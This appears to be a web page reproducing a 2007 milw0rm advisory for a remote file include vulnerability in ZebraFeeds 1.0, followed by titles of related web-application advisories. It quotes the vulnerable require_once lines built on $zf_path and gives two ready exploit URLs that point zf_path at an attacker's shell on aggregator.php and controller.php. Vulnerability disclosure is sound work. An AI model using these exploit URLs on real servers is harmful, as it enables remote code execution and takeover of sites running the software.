Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability CodeAvalanche News SQL Injection nabopoll 1.2 Remote Unprotected Admin Section Vulnerability nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability From:ThE dE@Th <mostafa_ragab_(at)_msn.com> Date:15.02.2007Subject:ZebraFeeds 1.0 (zf_path) Remote File Include VulnerabilitiesTo ConTacT mE @ wWw.Asb-May.net/bb ScRiPt:-http://cazalet.org/zebrafeeds/releases/zebrafeeds-current.zip Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}>> ****************************************************************************** aggregator.php:- require_once($zf_path . 'includes/feed.php'); require_once($zf_path . 'includes/view.php'); require_once($zf_path . 'includes/template.php'); require_once($zf_path . 'magpierss/rss_fetch.inc'); controller.php:- require_once($zf_path . 'includes/template.php'); require_once($zf_path . 'includes/opml.php'); ******************************************************************************** ExPlOiT:-http://www.SitE.com/newsfeeds/includes/aggregator.php?zf_path=[Shell] ExPlOiT:-http://www.SitE.com/newsfeeds/includes/controller.php?zf_path=[Shell] ******************************************************************************* # milw0rm.com [2007-02-15]
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability
CodeAvalanche News SQL Injection
nabopoll 1.2 Remote Unprotected Admin Section Vulnerability
nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability
